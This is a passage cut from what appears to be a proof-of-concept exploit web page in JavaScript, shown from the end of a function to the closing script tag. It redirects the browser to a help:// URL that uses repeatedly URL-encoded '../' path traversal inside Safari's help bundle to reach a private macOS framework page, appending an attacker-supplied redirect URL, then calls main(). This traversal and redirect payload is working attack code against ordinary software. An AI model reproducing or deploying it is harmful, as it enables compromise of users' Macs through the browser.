    document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=" + url;
}

main();

</script>